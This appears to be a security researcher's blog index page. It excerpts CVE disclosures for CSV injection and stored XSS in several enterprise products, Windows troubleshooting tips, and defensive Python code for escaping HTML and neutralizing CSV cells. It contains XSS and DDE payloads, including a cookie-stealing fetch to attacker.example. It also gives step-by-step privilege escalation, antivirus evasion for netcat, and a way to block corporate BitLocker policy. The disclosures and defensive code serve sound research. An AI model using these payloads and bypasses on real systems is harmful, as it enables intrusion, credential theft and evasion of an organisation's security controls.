Posts

Ericsson ECM (Enterprise Content Management) Solution Vulnerable to CSV Injection (CVE-2021-41390)

Dear Reader, I was able to identify a CSV injection vulnerability in the Ericsson ECM solution, version 18.0 (0331) R1E. CVE ID: CVE-2021-41390. Below are its details:

# Software description:
Ericsson Catalog Manager allows customers to rapidly launch and enable new innovative offerings, with a simple user experience and enterprise product, service and resource catalog capabilities.

# Technical Details & Impact:
It was observed that the Security Provider endpoint in the User Profile Management section is vulnerable to CSV injection: user-supplied values that end up in a CSV export are not neutralized, so a cell beginning with a formula character (=, +, -, @) is evaluated by the spreadsheet application that opens the export. Maliciously crafted formulas can be used for three key attacks:
1. Hijacking the user's computer by exploiting vulnerabilities in the spreadsheet software, such as CVE-2014-3524.
2. Hijacking the user's computer by exploiting the user's tendency to ignore security warnings in a spreadsheet they downloaded from their own website.
3. Exfiltrating contents from the spreadsheet, or from other open spreadsheets.

# POC Lo...

Ericsson ECM (Enterprise Content Management) Solution Vulnerable to Stored XSS (CVE-2021-41391)

Dear Reader, I was able to identify stored XSS in the Ericsson ECM solution, version 18.0 (0331) R1E. CVE ID: CVE-2021-41391. Below are its details:

# Software description:
Ericsson Catalog Manager allows customers to rapidly launch and enable new innovative offerings, with a simple user experience and enterprise product, service and resource catalog capabilities.

# Technical Details & Impact:
It was observed that the Security Management endpoint in the User Profile Management section is vulnerable to stored XSS. In most test cases session hijacking was also possible by utilizing the XSS vulnerability. This potentially allows full account takeover, or exploiting admins' browsers using the BeEF framework.

# POC
Log in as a normal user in ECM. Click on User Profile Management and then on Preference Definition, or just visit this URL: "https://host:port/ecm/securityManagement" (change the host/port to your ECM host/...

Microsoft Teams Webinar Vulnerable to CSV Injection

Dear reader, while testing different features of Teams, I found a CSV injection vulnerability in the Teams webinar feature: any external user or attacker can register to attend a public webinar and, on the webinar registration page, inject a malicious payload that will be executed once the admin downloads the attendee list. As per Microsoft, they are not accepting it as a high/medium security bug (which I totally disagree with), it is not eligible for a bounty or the hall of fame, and they gave permission to disclose it publicly. As per Microsoft, the admin has to click the Enable button once they open the report. I mentioned to them multiple times that the admin will always trust the report because it comes from a trusted source, which in this case is Microsoft, and 95% of the time they will click the Enable button and the payload will be executed. Anyway, let's start with the vulnerability details. At the end of this document I will give a bonus trick on how to find publicly available ...

Windows Update / Defender update issue

Today while updating Windows Defender to the latest version, I ran into the issue below: it would not update to the latest version and showed error code 0x80070643. Multiple retries and troubleshooting runs were performed but nothing helped. Later I found the commands below, which update Defender from an elevated command prompt (Run as Administrator), and they fixed the issue:
cd %ProgramFiles%\Windows Defender
MpCmdRun.exe -removedefinitions -dynamicsignatures
MpCmdRun.exe -SignatureUpdate
The first MpCmdRun command discards the dynamically downloaded signatures; the second forces a fresh signature download.

Joplin App Desktop Version Vulnerable to XSS

Dear Reader, Jubair Rehman Yousafzai here. Update Sept 2022: CVE assigned, CVE-2021-33295 https://www.cvedetails.com/cve/CVE-2021-33295/ During testing of the Joplin desktop app before version 1.8.5, I was able to execute a malicious XSS payload entered in the main body of a note: once I clicked the toggle button twice, the payload executed successfully. The payload I used for this test is: <noscript><p title="</noscript><img src=x onerror=alert('testing')>"> The payload relies on HTML parsers treating <noscript> content differently with scripting enabled and disabled: a sanitizer that sees the <img> as harmless attribute text inside the title lets it through, while the rendering browser closes the <noscript> early and creates a real <img> element whose onerror handler runs. Below is the POC for this exploit. After reporting to the Joplin team they fixed the issue directly and released the fix in version 1.8.5. Below are their release notes and details: https://github.com/laurent22/joplin/releases/tag/v1.8.5 Thanks, Jubair Rehman: https://twitter.com/jubairfolder

Win10 WIFI keeps on disconnecting

Dear Reader, for the last two days I was extremely annoyed by Windows 10 and my Lenovo L490: my WiFi started disconnecting every few minutes, or sometimes after an hour. I tried every method suggested on the internet; below are the methods I performed.
1. Uninstalling the WiFi driver from Device Manager and restarting the system. The driver was reinstalled automatically after the restart, but this solved the issue only temporarily and the WiFi started disconnecting again after an hour.
2. My laptop was connected to 5 GHz WiFi, so I tried connecting to 2.4 GHz. Still the same issue.
3. Downloading the new WiFi driver from the Lenovo website and installing it. Still the same issue.
4. Turning off the option "Allow the computer to turn off this device to save power" (details on how to turn it off are mentioned below).
5. Resetting Winsock by entering the two commands below in CMD (Run as Administrator). Same issue.
-> netsh winsock reset
-> netsh int ip reset
6. ...

NetSkope Unauthenticated CSV Injection in Admin UI (CVE-2020-28845)

This post is related to a CSV injection in the Netskope Admin UI (version 75.0), where an unauthenticated user can inject a malicious payload into the audit logs of the admin portal; once the admin exports and opens the report, the malicious payload is executed. CVE ID: CVE-2020-28845.
Test case: the audit logs consist of login attempts, which include the username. For the test case I injected a non-malicious payload in the username field of the login form; this payload was reflected in the audit logs and was executed once we downloaded and opened the report.
Exploitation: in the screenshot below you can see a sample CSV injection payload and a dummy password. To verify that our payload is reflected in the audit logs of the admin portal, we logged in as an admin, and in the screenshot below our payload can be seen. The Netskope admin then exported and downloaded the report. When the admin opened the downloaded report, our payload was executed. This vulnerability has now been fixed in the latest version of Netskope, and CVE ID ...

Ericsson BSCS iX R18 Billing & Rating (ADMX, MX) - Stored XSS (CVE-2020-29144, CVE-2020-29145)

Dear Reader, I was able to identify stored XSS in multiple web-based modules of the Ericsson BSCS iX R18 Billing & Rating platform. Below are its details:

# Software description:
Ericsson Billing is a convergent billing solution for telecoms that combines an unrivaled set of out-of-the-box features with high configurability. As an evolution of the widely installed Ericsson BSCS iX, Ericsson Billing provides a low-risk but effective route to capture and secure revenue streams and take advantage of business opportunities from traditional telecom services as well as digital services, 5G and IoT.

# Technical Details & Impact:
There are multiple web-based modules in BSCS iX, e.g. ADMX, MX (monitoring center), CX etc. It was observed that ADMX and MX are vulnerable to stored XSS. In most test cases session hijacking was also possible by utilizing the XSS vulnerability. This potentially allows full account takeover, or exploiting admins' browsers using BeEF...
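The three stored XSS posts on this page (Ericsson ECM, Joplin and BSCS iX) all come down to one sink: a stored string rendered into HTML without escaping for the context it lands in. The block below is an added example written for this page, not code from Ericsson, Joplin or the author. It shows the vulnerable concatenation beside the escaped version, using Python's standard html module, and includes a coarse triage check for exported profile data. The sample payloads are constructed: the Joplin payload quoted above plus two classic attribute-break and script-tag cases. The function names are hypothetical.

```python
import html
import re

# Constructed payloads used as sample input (not captured from any real target):
# the Joplin payload quoted on this page, plus two classic cases.
SAMPLE_PAYLOADS = {
    "noscript_trick": '<noscript><p title="</noscript><img src=x onerror=alert(\'testing\')>">',
    "attr_break": '" onmouseover="alert(document.cookie)',
    "script_tag": "<script>fetch('//attacker.example/?c='+document.cookie)</script>",
}

# Coarse indicator for triaging stored data (e.g. a user-profile export).
# Escaping is the fix; this regex is not a filter to rely on.
XSS_INDICATOR = re.compile(
    r"<\s*(script|img|svg|iframe)\b|\bon[a-z]+\s*=|javascript:", re.IGNORECASE
)


def looks_like_xss(value: str) -> bool:
    """Flag stored values that carry common script-bearing markup."""
    return XSS_INDICATOR.search(value) is not None


def render_text(value: str) -> str:
    """Escape untrusted data for an HTML text node (between tags)."""
    return html.escape(value, quote=False)


def render_attr(value: str) -> str:
    """Escape untrusted data for a double-quoted HTML attribute value.

    quote=True also encodes " and ', so the value cannot close the attribute
    and start a new one (the attr_break payload above).
    """
    return html.escape(value, quote=True)


def profile_row_vulnerable(display_name: str, title: str) -> str:
    """Stored XSS sink: user-controlled strings concatenated straight into HTML."""
    return f'<td title="{title}">{display_name}</td>'


def profile_row_safe(display_name: str, title: str) -> str:
    """Same row, each value escaped for the context it lands in."""
    return f'<td title="{render_attr(title)}">{render_text(display_name)}</td>'


if __name__ == "__main__":
    for name, payload in SAMPLE_PAYLOADS.items():
        print(name, "->", "flagged" if looks_like_xss(payload) else "clean")
        print("  vulnerable:", profile_row_vulnerable(payload, payload))
        print("  safe      :", profile_row_safe(payload, payload))
```

Escaping works when the field is supposed to hold plain text, which is the case for the profile and preference fields in the Ericsson posts. Where the application must render user-authored markup, as Joplin does with Markdown, escaping is not an option and a real HTML sanitizer is needed; the noscript payload above is exactly the kind of parser differential such a sanitizer has to get right.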

CSV Injection in Kibana 6.6.1 Up to Latest Version 7.5.2

Dear reader, a few days ago I was testing Kibana in my organization, which uses Kibana version 6.6.1. While testing I was able to find a CSV injection in the Dashboard tab. There was no CVE or any other information about this specific vulnerability, so I reported the issue to the Kibana team, and it will be fixed as a security hardening feature. Let's start with the POC of this vulnerability. Below are the steps to reproduce.
1. A large number of Kibana portals on the internet are exposed without authentication and can be exploited through this injection.
2. Click on the Dashboard tab and select any dashboard from the list. I would suggest selecting a dashboard that has a gauge visualization, as shown in the screenshot below.
3. Once you are on the dashboard, click the Edit button at the top right.
4. Click the gear (options) button of any visualization panel.
5. ...
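Four posts on this page (Ericsson ECM, Teams webinar, Netskope audit logs and Kibana) describe the same bug: a value an attacker controls is written into a CSV export that an administrator opens in a spreadsheet. The block below is an added example for this page, not code from any of those products or from the author. It shows the vulnerable export beside the neutralized one, following the OWASP CSV injection guidance (quote every cell, double embedded quotes, prefix formula-triggering cells with an apostrophe), and a triage helper that lists the cells in an export a spreadsheet would evaluate, which is useful both for checking a report before opening it and for confirming a payload landed during a test. The audit-log rows are constructed sample data; the function names are hypothetical.

```python
import csv
import io

# Characters that make Excel, LibreOffice Calc and Google Sheets evaluate a
# cell as a formula instead of displaying it (OWASP CSV Injection guidance).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Constructed sample: an audit-log export like the ones described on this page,
# with usernames that are really DDE payloads. Not captured from any product.
SAMPLE_AUDIT_ROWS = [
    {"timestamp": "2020-11-01T10:00:00Z", "username": "alice", "result": "success"},
    {"timestamp": "2020-11-01T10:01:00Z", "username": "=cmd|' /C calc'!A0", "result": "failed"},
    {"timestamp": "2020-11-01T10:02:00Z", "username": '@SUM(1+9)*cmd|" /C calc"!A0', "result": "failed"},
    {"timestamp": "2020-11-01T10:03:00Z", "username": "-2+3+cmd|' /C calc'!A0", "result": "failed"},
]
COLUMNS = ["timestamp", "username", "result"]


def is_formula_like(cell: str) -> bool:
    """True if a spreadsheet would evaluate this cell rather than display it."""
    return cell.startswith(FORMULA_TRIGGERS)


def neutralize_cell(value) -> str:
    """Make one value safe to place in a CSV cell.

    A leading apostrophe forces text interpretation. The writer in
    export_safe wraps every cell in double quotes and doubles embedded
    double quotes, so the value cannot break out of its cell either.
    """
    text = "" if value is None else str(value)
    return "'" + text if is_formula_like(text) else text


def export_unsafe(rows, columns) -> str:
    """The vulnerable pattern: values written to CSV exactly as stored."""
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")
    writer.writerow(columns)
    for row in rows:
        writer.writerow([row.get(col, "") for col in columns])
    return buf.getvalue()


def export_safe(rows, columns) -> str:
    """Same export with every cell neutralized and fully quoted."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(columns)
    for row in rows:
        writer.writerow([neutralize_cell(row.get(col, "")) for col in columns])
    return buf.getvalue()


def find_formula_cells(csv_text: str):
    """Triage helper: (row, column, cell) for every cell a spreadsheet would
    evaluate. Quoting is parsed first, so a quoted "=..." still counts."""
    hits = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if is_formula_like(cell):
                hits.append((r, c, cell))
    return hits


if __name__ == "__main__":
    print("unsafe export:", find_formula_cells(export_unsafe(SAMPLE_AUDIT_ROWS, COLUMNS)))
    print("safe export:  ", find_formula_cells(export_safe(SAMPLE_AUDIT_ROWS, COLUMNS)))
    print(export_safe(SAMPLE_AUDIT_ROWS, COLUMNS))
```

Two caveats a practitioner should keep in mind. First, double-quoting alone does not help: the csv reader strips the quotes before the spreadsheet sees the cell, which is why find_formula_cells still flags the quoted cells of the unsafe export. Second, the apostrophe prefix also hits legitimate values that start with a minus sign, so negative numbers in an export come out as text; if that matters, exempt purely numeric cells before prefixing.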

Personal / Locked Folder in Windows

Dear reader, the article below is about creating a personal folder that cannot be accessed by anyone, or by 98% of users; even your system administrator or your organization's administrators (AD admins) will not be able to access it (except through the two tricks shared at the end of the article). So let's start. As you may be aware, there are certain words/names that you cannot give to a folder in Windows: you can't create a folder named CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8 or LPT9, because these names are reserved for system-related operations (they are legacy DOS device names). But there is a trick to create folders using these names, and if you double-click such a folder it won't open, and in CMD you can't CD or DIR into it, which means nothing inside that folder can be viewed (except through one trick that will be shared at the end of thi...
Note that this is obscurity rather than access control: the NTFS permissions on the folder are unchanged, and anything that addresses the folder by a path form the Win32 name parser does not rewrite can read it normally.

Windows 7 Escalation of Privilege

Dear all, this article is about a Windows 7 escalation of privilege identified by the Zero Day Initiative (article link; the issue is CVE-2019-1388, the certificate dialog elevation of privilege). Here is the short version of how to escalate privileges if your Windows 7 has not been updated in or after November 2019.
First, download an application that is signed with an old Microsoft certificate. Right-click it, go to Properties and click the Unblock button. Right-click the application and select Run as administrator; the UAC box will appear. Click Show details; it will show you a hyperlink. Click it and a certificate popup box will appear, with a hyperlink in front of the "Issued by" row. Click it and it will open Internet Explorer running with SYSTEM privileges (the UAC consent dialog itself runs as SYSTEM, so anything it launches inherits that). Close all the popup boxes and open the minimized IE. Click the Settings button and click Save As; from there you can browse to the windows\system32 directory and run cmd.exe. Exploitation video: https://www.youtube.com/watch?v=3BQKpPNlTSo Also, below are the links to old signed "Micros...

HSTS Error in Firefox

Dear Reader, today while testing a website I changed my Firefox proxy settings to the Burp Suite proxy and completed the testing. When I reverted to the normal/system proxy settings, websites like Google and other HTTPS sites started showing an HSTS error because of our organization's self-signed (intercepting proxy) certificate. If you are facing the same error, follow the steps below:
1. Close all tabs in Firefox.
2. Go to the proxy settings in Firefox and set your manual proxy, or select the system proxy. Note that if you select the system proxy, you have to set the proxy in Internet Explorer (the Windows internet options).
3. Once everything is done, open a new tab, type about:config and hit Enter. It will show you a warning; accept it.
4. On the page that opens there is a search bar at the top; paste this into it: security.enterprise_roots.enabled
5. The search will show you the preference; double-click it and its value will change to true. This preference tells Firefox to trust the CA certificates in the operating system's certificate store in addition to its own, which is why the organization's proxy CA (installed in Windows but not in Firefox) stops triggering HSTS errors.
6. Close your browser and open it ag...

Windows 10 ms-settings Opens cmd

Dear all, especially penetration testers: if you were testing some new Windows exploit that helps with a UAC bypass or fileless UAC bypass, and after running it you notice that all settings (network settings, display settings and other Windows settings) no longer open, or open cmd.exe instead of the normal Settings page, you are in the right place to find the solution. Today I was testing a Windows 10 UAC bypass exploit and my system's Settings stopped working, with some settings opening cmd.exe, which annoyed me a lot; after a little research and reading the exploit code, I found the solution. The steps are below, and the good news is that you don't need admin rights to do it.
1. Open the registry editor (Win+R, type regedit and hit Enter).
2. Go to this path in the registry: HKEY_CURRENT_USER\Software\Classes
3. Inside the Classes key you will see an ms-settings key. Right-click ms-settings and rename it to ms-settings- or any other name.
4. Close the regis...
Why this works: fodhelper-style UAC bypasses create HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command (with a DelegateExecute value) so that the ms-settings: protocol handler launches the attacker's command instead of Settings, and the key is left behind after the exploit runs. That key normally does not exist under HKCU, so deleting it rather than renaming it is the cleaner fix; renaming has the same effect.

BitLocker Auto Encryption Bypass / Postponed Forever

Dear reader, as you know we update this blog whenever we get into some kind of trouble in our daily life. Today our organization started a BitLocker rollout on all systems, which encrypts all drives. I allowed encryption on only the C (Windows) drive, but soon after that BitLocker started giving me popups like "encrypt your D and E drives". I clicked Postpone multiple times but the popup kept reappearing after a few minutes. So, if you have faced the same issue, below is an awesome trick to bypass it; you won't find this trick anywhere else on the internet as it is completely self-learned. I knew that BitLocker must somehow be communicating with a centralized server for policy updates, or maybe for other communication such as key recovery or reports, and I knew that the server information would be stored in the registry. The problem was to search for those registry keys, find the server information, and then edit the hosts file, assigning localhost to the serv...

VMware Workstation: No eth0 after Windows 10 Update

Hi everyone, as you know we update this blog whenever we encounter an issue and solve it after a lot of trying. Today we will talk about VMware and the "no IP / no eth0" problem. The problem I faced came after I updated my Windows 10 WiFi driver (it was causing issues whenever I wanted to connect to a new WiFi network, always giving errors like "can't connect", so I had to update it). As soon as I updated the driver, all the *nix (Linux/Unix) VMs in my VMware Workstation 12 stopped working, while my Windows VMs worked fine: a plain ifconfig only showed the loopback interface and no eth0 interface. When I ran ifconfig -a it showed eth0, but with no IP address assigned to it. If you are having the same problem, the solution below can help you. First, log in to your *nix machine as root (or use sudo) and then perform the steps below.
Step 1: leafpad /etc/network/interfaces or...

Bypassing Antivirus (Cisco AMP for Endpoints)

Dear all, it's been a while since we updated this forum. Today we will talk about AV bypassing, or rather checking whether your antivirus really is what it claims to be. I started testing Cisco AMP for Endpoints: it was detecting the netcat binary (nc.exe) as a remote monitoring tool and kept deleting it. To bypass the AV I copied nc.exe to an excluded directory that I already knew about. If you don't have such a directory, perform the actions below on a VM or another machine that does not have Cisco AMP installed. So let's start the bypassing process. We will assume that we copied our nc.exe into the directory below:
C:\excluded\
Open PowerShell (press Win+R and type powershell). Move to the excluded directory in PowerShell:
cd C:\excluded\
Type the following commands in PowerShell. Replace test.exe with the name of the exe that you do not want the antivirus to detect.
Get-FileHash -Path '.\test.exe' -Algorithm SHA256 (first note the hash)
Add-Content -...

Java Installation / Uninstallation Error (Solution for Any Error)

Dear visitor, as you all know this blog is updated when we admins get stuck on some error and, after some hard work, solve it; we then post the problem and the solution. Today I was trying to install Java 8 on my laptop, but the installer gave me an error. After many, many tries I was able to install Java 8, so let's start.
----- Why the error occurs: most of the time a Java installation error is caused by leftovers of an old version, and sometimes by the Java version you are trying to install. So I will show you a completely automatic solution: in just a few clicks you will have the latest version of Java.
---- Requirement:
1. JavaRa (download page: https://singularlabs.com/software/javara/javara-download/ ) Free
---- Steps:
Download JavaRa and unzip it. Run JavaRa.exe as an administrator. As shown in the image below, this tool has some good options. First we will uninstall Java and all its leftover components, so click on Remove Java Runtime. Next click on the drop-down and ...

Android Contacts Not Showing / Not Syncing

Hi guys, today I came across a most disturbing situation when trying to save a contact to my Android contact list from my call log. Everything went well until I tapped DONE (to save the contact): it kept on loading ("Saving contact"). So I restarted my phone (my worst decision). After the restart, every 2-3 minutes the contacts got hidden; in the dialer I wasn't able to search anything, and I wasn't able to sync to my Google account. After a shutdown and power-on the contact list just showed "Contact list being updated", but after a restart it worked for 2-3 minutes. Later I understood that it was because of that one corrupt/unsaved contact. Here are the steps I took to fix the problem. I directly unplugged the battery from my phone without selecting the restart/shutdown option. I plugged the battery in again and started the phone. As it started I opened Contacts (at that time it was working fine), selected the Import/Export option and backed up my contacts to...

Creating a new application pool in IIS

If you see only two application pools and both of them are set to the .NET Framework 2.0, you have to install ASP.NET 4 in IIS:
Open a command prompt window by right-clicking Command Prompt in the Windows Start menu and selecting Run as Administrator. Then run aspnet_regiis.exe to install ASP.NET 4 in IIS, using the following commands. (On 64-bit systems, replace "Framework" with "Framework64".)
cd %windir%\Microsoft.NET\Framework\v4.0.30319
aspnet_regiis.exe -iru
This command creates new application pools for the .NET Framework 4, but the default application pool will still be set to 2.0. You'll be deploying an application that targets .NET 4 to that application pool, so you have to change the application pool to .NET 4. If you closed IIS Manager, run it again, expand the server node, and click Application Pools to display the Application Pools pane aga...

What is the difference between ExecuteScalar, ExecuteReader and ExecuteNonQuery?

ExecuteReader: used for any result that returns multiple rows/columns; mostly used for SELECT statements. It returns a DataReader that you iterate over, one row at a time.
ExecuteScalar: used for a result that returns only a single value. If the query returns more than one row/column, the result is the first column of the first row and everything else is discarded. Mostly used with aggregate functions like SUM, AVG and COUNT.
ExecuteNonQuery: used for queries that do not return a result set; mostly used with DELETE, UPDATE and INSERT statements. It returns the number of rows affected.
Whichever of the three you call, build the command with parameters (SqlParameter) rather than by concatenating user input into the SQL string; the execute method does not protect you from SQL injection.